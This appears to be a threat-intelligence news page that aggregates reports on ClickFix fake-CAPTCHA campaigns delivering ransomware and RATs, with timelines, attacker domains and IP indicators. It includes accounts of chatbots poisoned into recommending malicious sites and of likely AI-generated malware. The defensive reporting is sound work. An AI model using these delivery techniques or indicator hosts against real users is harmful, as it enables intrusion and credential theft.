ClickFix Social Engineering Campaigns Expand Malware and Ransomware Delivery
Researchers reported continued expansion of ClickFix as an initial-access technique, with attackers using fake CAPTCHA or verification pages to trick users into executing clipboard-delivered commands on Windows systems. In one campaign, LeakNet shifted away from relying on initial access brokers and instead used compromised legitimate websites hosting fake Cloudflare Turnstile checks to broaden victim acquisition and reduce network-based detection. ReliaQuest linked the activity to LeakNet through overlapping infrastructure and consistent TTPs, and noted the group paired ClickFix with a stealthy, memory-resident loader built on the Deno JavaScript runtime to support ransomware operations.
A separate ClickFix campaign analyzed by Atos used the same user-executed command pattern to map attacker-controlled network drives with net use, then download a trojanized but legitimately signed WorkFlowy application whose modified asar archive executed malicious code in the Node.js main process with the logged-in user’s privileges. Other reporting on Hive0163 also identified ClickFix as one of several initial-access methods used in Interlock ransomware intrusions, although that article focused primarily on the group’s likely AI-generated Slopoly malware rather than a specific ClickFix incident. Reporting on Operation Covert Access in Argentina’s judicial sector was unrelated, describing spear-phishing with fake court documents to deliver COVERT RAT via a different intrusion chain.
Get ahead of threats like this
Mallory correlates global threat intelligence with your attack surface — know if you’re exposed before adversaries strike.
How this story unfolded
7 events from the most recent confirmed update back to the earliest known activity.
ReliaQuest attributes expanded ClickFix and Deno activity to LeakNet
ReliaQuest reported with high confidence that LeakNet was behind an expanded campaign using ClickFix lures and a stealthy Deno-based in-memory loader. The attribution was based on overlapping infrastructure and consistent tactics, techniques, and procedures observed across multiple incidents.
Atos identifies ClickFix campaign mapping attacker-controlled drives
Atos researchers identified a new ClickFix campaign that used fake CAPTCHA pages to trick Windows users into running hidden commands through the Run dialog. The attack mapped a remote drive with the native net use command and delivered a trojanized WorkFlowy application that communicated with the command-and-control domain cloudflare.report.
LeakNet shifts to self-delivered ClickFix and Teams phishing campaigns
By March 2026, LeakNet had expanded beyond relying mainly on initial access brokers and began using ClickFix lures on compromised websites, and in at least one case Microsoft Teams phishing, to gain access directly. The updated intrusion chain used a Deno-based in-memory loader and a consistent post-exploitation sequence including jli.dll sideloading, klist, PsExec, and exfiltration to cloud services.
IBM publicly reports Slopoly and links Hive0163 to Interlock activity
IBM X-Force disclosed its findings on Slopoly on March 16, 2026, describing it as likely AI-generated malware used by Hive0163 in a ransomware intrusion. The report also linked Hive0163 to Interlock ransomware operations, custom tooling, malvertising, and possible cooperation with initial access brokers, and published indicators including the domain plurfestivalgalaxy[.]com.
Hive0163 deploys likely AI-generated Slopoly malware
During the same early-2026 live incident, Hive0163 deployed Slopoly, a custom command-and-control client that IBM X-Force assessed as likely AI-generated. IBM cited traits such as extensive comments, consistent error handling, clearly named variables, and an unused jitter function in support of that assessment.
Hive0163 launches intrusion via ClickFix social engineering
In early 2026, a Hive0163 intrusion began with a ClickFix social engineering attack that tricked a user into running a malicious PowerShell command. The attackers then deployed NodeSnake, InterlockRAT, Slopoly, and post-exploitation tools including AzCopy and Advanced IP Scanner.
LeakNet ransomware first observed
LeakNet was first observed as an emerging ransomware operator in late 2024. Early reporting described it as a relatively low-volume operation before its later expansion in scale and tradecraft.
Related entities
Vulnerabilities, threat actors, malware, products, organizations, and breaches Mallory has linked to this story.
Sources
5 references tracked. Mallory keeps watching after this page renders.
LeakNet Ransomware Dissection - TheCyberThrone
thecyberthrone.in
Open sourceLeakNet Scales Ransomware Operations With ClickFix Lures and Stealthy Deno Loader
cybersecuritynews.com
Open sourceNew ClickFix Scam Tricks Users Into Mapping Hacker-Controlled Drives
hackread.com
Open sourceCasting a Wider Net: ClickFix, Deno, and LeakNet’s Scaling Threat
reliaquest.com
Open sourceIBM Uncovers ‘Slopoly,’ Likely AI-Generated Malware Used in Hive0163 Ransomware Attack - Cyber Security News
cybersecuritynews.com
Open sourceSee the full picture, correlated to your attack surface.
Map indicators from this story to your assets and identify affected systems in minutes.
Every observed campaign, victim, and pivot linked to actors named in this story.
Malware, exploits, and IOCs connected to the activity described here.
YARA, Sigma, and Snort rules deployed to your SIEM as soon as they’re published.
Get matching new stories delivered to your team as they break — not the next morning.
Ask questions about this story and take action on the answers.
Related stories
Other stories Mallory is tracking that overlap on entities, sources, or topic labels.
ClickFix Social Engineering Drives Multiple Malware and Ransomware Intrusions
Attackers are increasingly using **ClickFix** fake CAPTCHA and verification lures on compromised websites to trick users into manually executing malicious commands, turning social engineering into a scalable initial-access method. **LeakNet** adopted the technique to reduce reliance on stolen credentials and initial access brokers, using hacked sites to deliver a staged **Deno**-based in-memory loader before following a repeatable post-exploitation sequence that can end in ransomware deployment. Separately, the **ZPHP** campaign used similar fake Cloudflare Turnstile-style prompts against U.S. **SLTT** organizations to deliver **Remcos RAT**, with hidden JavaScript on compromised sites selectively replacing page content with attacker-controlled instructions for Windows users. The reporting indicates a broader shift in which ClickFix is no longer tied to a single actor or payload, but is being reused across financially motivated and malware-delivery operations because it is cheap, effective, and difficult for users to recognize as malicious. One additional roundup reference points to **Termite ransomware** and **CastleRAT** activity linked to ClickFix, reinforcing that the technique is spreading across campaigns, but it does not provide enough detail to treat that activity as the same incident as **LeakNet** or **ZPHP**. This is **not fluff**: the material contains concrete threat intelligence on active intrusion methods, victim targeting, malware delivery chains, and operational tradecraft relevant to enterprise defense.
Mar 21, 2026
ClickFix Social-Engineering Technique Used to Trick Users Into Running Malware
Multiple reports highlighted **ClickFix**, a social-engineering technique that uses fake verification or update prompts to coerce users into manually executing attacker-supplied commands, as a recurring initial access method in recent malware activity. In the **OCRFix** botnet campaign, victims were lured to a typosquatted site impersonating *Tesseract OCR* (`tesseract-ocr[.]com` lookalike) via SEO poisoning and reported **LLM poisoning** (chatbot recommendations pointing users to the malicious site). The site presented a fake CAPTCHA that copied an obfuscated PowerShell command to the clipboard and instructed the user to paste it into PowerShell; this led to retrieval of a malicious MSI (`98166e51.msi`) from `opsecdefcloud[.]com`, after which victims were redirected to the legitimate GitHub project to reduce suspicion. The loader then queried a **BNB TestNet** smart contract to obtain C2 details, using **EtherHiding** (blockchain-hosted instructions) to make takedown and disruption more difficult. A separate investigation described a **Chrome extension supply-chain compromise** of *QuickLens – Search Screen with Google Lens* (7,000+ users), where attackers acquired the extension and shipped an update embedding malicious scripts and elevated permissions to enable credential/crypto theft and staged payload delivery; the campaign also incorporated a **ClickFix** flow that masqueraded as a legitimate browser update to trick users into executing malicious code. Other items in the set covered different topics: an AiTM phishing-kit attribution case study (focused on reverse-proxy phishing infrastructure rather than ClickFix), research on **Funnull/Fangneng CDN** as cybercrime-enabling infrastructure and related supply-chain activity, and Zscaler reporting on **Dust Specter APT** targeting Iraqi government officials with password-protected RAR delivery and custom malware modules—none of which were primarily about ClickFix.
Mar 21, 2026
ClickFix Social Engineering Drives Multi-Platform Malware Delivery
Security researchers reported multiple active campaigns using **ClickFix** social engineering—fake error dialogs or verification prompts that trick users into manually running attacker-supplied commands—to bypass browser and download protections and establish an initial foothold. In one enterprise case investigated by **CERT Polska (cert.pl)**, victims were lured via compromised websites showing a fake CAPTCHA/“fix” prompt that instructed them to paste and run a **PowerShell** command via `Win+R`; the script then downloaded a dropper and enabled rapid follow-on activity that can scale to **enterprise-wide compromise**, including deployment of secondary malware such as **Latrodectus** and **Supper** for data theft, lateral movement, and potential ransomware staging. A separate ClickFix operation targeted **macOS developers** by cloning the *Homebrew* site on typosquatted infrastructure; the “install” command was subtly altered to fetch content from `raw.homabrews.org` instead of `raw.githubusercontent.com`, leading to **Cuckoo Stealer** deployment and credential harvesting via repeated password prompts using macOS Directory Services, with related domains tied to shared hosting at **`5.255.123.244`**. ClickFix was also observed as the initial execution mechanism for the resurfaced **Matanbuchus 3.0** MaaS loader, which uses deceptive copy/paste prompts and **silent MSI** execution (via `msiexec`) to deliver a new payload, **AstarionRAT**, enabling capabilities including credential theft and **SOCKS5** proxying; operators were reported to move laterally quickly (including toward domain controllers), consistent with ransomware or data-exfiltration objectives.
Mar 21, 2026